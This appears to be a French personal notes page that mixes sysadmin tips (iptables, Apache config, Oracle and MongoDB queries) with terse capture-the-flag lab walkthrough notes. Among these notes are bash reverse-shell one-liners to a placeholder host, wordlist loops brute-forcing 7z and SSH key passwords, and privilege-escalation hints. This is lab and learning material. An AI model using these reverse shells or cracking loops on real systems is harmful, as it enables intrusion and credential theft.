Unblock iptables rule

iptables -L f2b-apache-auth   -n --line-numbers
iptables -D INPUT <line number>

Préconisation OWASP dans un module (Apache / Nginx)

https://coreruleset.org/installation/

Nginx sécurisé

https://github.com/bunkerity/bunkerized-nginx

(via Korben)

Pour avoir le binaire des classes modifiées :

-Dintroscope.agent.instrumentation.verification.debug=<prefix a dumper> -Dintroscope.agent.instrumentation.debugdump.path=/tmp/mydir/

Exemple de préfixe: com/springframework/utils

Si pas de classe suffixé after alors la classe n'est pas instrumentée

/!\ Ne pas oublier le "/" à la fin du répertoire... sinon ça préfixe le fichier

Pour ne pas refaire les mêmes :)

CyberSploit: 1

robots.txt + kernel

CyberSploit: 2

rot47 + password sur site web + docker (GTFOBins)

Funbox3: Easy

easy password/SQL injection + p0wny-shell + sudo (time or pkexec or mtr)

FourAndSix2

nfs + hashcat (7z) + id_rsa (indice avec les images) + less (GTFOBins)

FourAndSix

mount /shared et mount / non exposé

Funbox1

wordpress low password (wpscan), upload shell/ssh user (joe) has same password, bad permissions between joe and funny, crontab executed by funny, reverse shell, put new ssh key on funny, funny member of lxd, (https://www.hackingarticles.in/lxd-privilege-escalation/ : new image, add mapping for root, connect to image. There is a faster way : root crontab run same script as funny :) :) : can modify /root or list flag or whatever, stickbit, add sudo...

Funbox2: Rookie

ftp anonymous, hidden files, list of protected zip, zip2john tous les zip, 2 ont des passwords facile, clé rsa non protégée, user appartient au group lxd, idem Funbox1 pour la suite

Funbox4: CTF

ROBOTS.txt, scroll down, hidden file : upload.php (add extension for dirb), upload shell, check user home, bruteforce with rockyou + ! for thomas and normaly gcc + exploit kernel but no gcc on server....

Quaoar:

wordpress low password or plugin vulnerability (wpscan), reverse shell, wpconfig (root db password), weak root (same as db) or weak wpadmin

Funbox5: next Level

dirb, plugin Request Control sur firefox (for IP redirection)

Pense bête

perl 7z2hashcat.pl ../tmp/backup.7z > ../tmp/hash.txt
#ou 
7z2john.py archive.7z > hash.txt

ensuite (https://infinitelogins.com/2020/04/29/how-to-crack-encrypted-7z-archives/) :

hashcat -m 11600 lightweight7z.hash /usr/share/wordlists/rockyou.txt

ou (https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c)

/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 

En ligne de commande :

cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done

Étape 1 : Transformer votre hôte en passerelle.

$ sudo -i
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# exit

Si vous voulez conserver l'ip forwarding après un reboot de l'hôte, pensez à décommenter la ligne "net.ipv4.ip_forward=1" dans le fichier /etc/sysctl.conf. Pour remettre les actions par défaut dans la table NAT, pensez à la commande :

sudo iptables -t nat -P POSTROUTING ACCEPT

Etape 2 : Ajoutez une route par défaut à l'invité :

sudo route add -net default gw IPHote

N'oubliez pas de remplacer IPHote par l'adresse IP de l'interface créée par VirtualBox sur l'hôte.

Il ne vous reste plus qu'a configurer les DNS (/etc/resolv.conf) et c'est terminé.

Pense-bête, scan des urls courantes

dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt

Pour retrouver les sticky bits sur les répertoires :

find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \;

Pour les fichiers (https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/)

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null

Reverse shell from different source

Cheatsheet : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Listen :

nc -l -vv -p <PORT>

Exemple bash :

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Parce que perte de sauvegarde sur crash de firefox... un fast restart...

$.each(SharkGame.ResourceTable, function(k, v) {
    if (k != 'essence' && k != 'numen' && k != 'chorus') {            
            console.log(k);
            SharkGame.PlayerResources[k] = {};
            SharkGame.PlayerResources[k].amount = 1000000;
            SharkGame.PlayerResources[k].totalAmount = 1000000;
            SharkGame.PlayerResources[k].incomeMultiplier = 1000000;
    }});

Ajout de règle pour laisser le répertoire acme accessible

<VirtualHost *:80>
        RewriteEngine on
        RewriteCond %{HTTPS} !=on [NC]
        RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/
        RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
        Include /etc/apache2/sites/demo.conf
</VirtualHost>

<VirtualHost *:443>
        Include /etc/apache2/sites/demo.conf

        SSLEngine on
        SSLCertificateFile /etc/ssl/certs/demo.signed.crt
        SSLCertificateKeyFile /etc/ssl/private/demo.key
        SSLCertificateChainFile /etc/ssl/certs/letsencrypt-root-intermediate.pem

</VirtualHost>

Évidemment, il y a la philanthropie aussi ^^

Quote :

I ran memtest86 and got two bad memory spots in two tests (Moving inversions, random pattern):

0x1BFAE5474
0x116A3FE55

Windows is able to blacklist bad memory addresses using the bcdedit tool. However it only blacklists page of memory (4KB) instead of single address. In order to convert from memtest86 single address syntax to bcdedit pages syntax I had to remove the last 3 letters from each memory address (since 0xFFF is 4KB).

memtest86   bcdedit Memory range from   Memory range to Size
0x1BFAE5474 0x1BFAE5    0x1BFAE5000 0x1BFAE5FFF 4 KB
0x116A3FE55 0x116A3F    0x116A3F000 0x116A3FFFF 4 KB

Running command promt as administrator I could blacklist the memory addresses:

# Enable memory blacklisting
bcdedit /set {badmemory} badmemoryaccess no
# Specify what addresses to blacklist
bcdedit /set {badmemory} badmemorylist 0x1bfae5 0x116a3f

Server-side template hacking helper

To make a long running request in Oracle :

View:

create or replace function TEST_PROC return number 
IS
start_time DATE := sysdate;
end_time DATE;
curr_time DATE;
id number :=0;
begin
end_time := start_time + interval '3' minute;
loop id := id + 1;
curr_time := sysdate;
exit when curr_time > end_time;
end loop;
return id;
end TEST_PROC;

create or replace VIEW TEST_VIEW (ID) as SELECT TEST_PROC() as ID from dual;

select * from TEST_VIEW;

showing current expensive queries plus most expensive object from execution plan:

select sa.sql_id,
  sp.child_number,
  sp.plan_hash_value,
  sa.parsing_schema_name SQL_PARSED_BY,
  sa.module,
  sa.action,
  sa.buffer_gets,
  sa.BG_PER_EXEC,
  sp.object_owner,
  --sp.object_name, -- this is the group factor
  sa.optimizer_cost,
  sp.cost COST_PER_EXP_OBJECT,
  round((sp.cost/sa.optimizer_cost)*100,0) OBJECT_COST_RELATION,
  listagg(OBJECT_NAME,', ') within group (order by object_name) MOST_EXPENSIVE_OBJECTS,
  sa.sql_text
 from
   (select sql_id,
     child_number,
     parsing_schema_name,
     module,action,
     buffer_gets,
     round(buffer_gets/nullif(executions,0),0) BG_PER_EXEC,
     optimizer_cost,
     sql_text
    from v$sql
    where parsing_schema_name <>'SYS'
   ) sa,
   (select sql_id, child_number, plan_hash_value, object_owner, object_name,cost,
     rank() over (partition by sql_id,child_number order by cost desc nulls last) costrank
     -- result set partitioned by sql and child to avoid duplicates 
     -- when same sql is executed by multiple users
    from v$sql_plan
    where (operation like '%INDEX%' or operation like '%TABLE%' or operation like '%MAT%')
     --and options='FULL' -- would limit to full table scans / full object scans
     and object_owner <>'SYS'
   ) sp
 where sa.sql_id=sp.sql_id
   and sa.child_number=sp.child_number
   and costrank=1 -- only use top costly object of each partition
 group by sa.sql_id,
   sp.child_number,
   sp.plan_hash_value,
   sa.parsing_schema_name,
   sa.module,
   sa.action,
   sa.buffer_gets,
   sa.BG_PER_EXEC,
   sp.object_owner,
   --sp.object_name, -- this is the group factor
   sa.optimizer_cost,
   sp.cost,
   round((sp.cost/sa.optimizer_cost)*100,0),
   sa.sql_text
 order by BG_PER_EXEC desc nulls last
 ;

Génération de labyrinthe.

via (https://sebsauvage.net/links/?Wgr4pg)

Find by id :

db.test.find({"_id" : ObjectId("4ecc05e55dd98a436ddcc47c")})

Show all ids :

var a = db.c.find({}, {_id:1}).map(function(item){ return item._id; })

Run actions on elements :

 tests.forEach(function(test) {
        if (evaluation.hasOwnProperty('toto')) {
            print('toto was here');
        } else {
            db.tests.save(test);
        }
    });

Run javascript :

load('/tmp/xxx.js');

Connect to database :

db = connect("mongodb://user:password@localhost:27017/lcri?authSource=admin");

S'échapper des shells restreints.
Et on peut utiliser tar, zip, awk pour lancer un shell interactif, j'en apprends tous les jours...

Une checklist : https://github.com/frizb/Linux-Privilege-Escalation
Une autre : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
A regarder : https://www.metahackers.pro/breakout-of-restricted-shell/

Et sans doute un service qui deviendra payant plus tard...
Et encore un peu d'amusement pour le SEO :)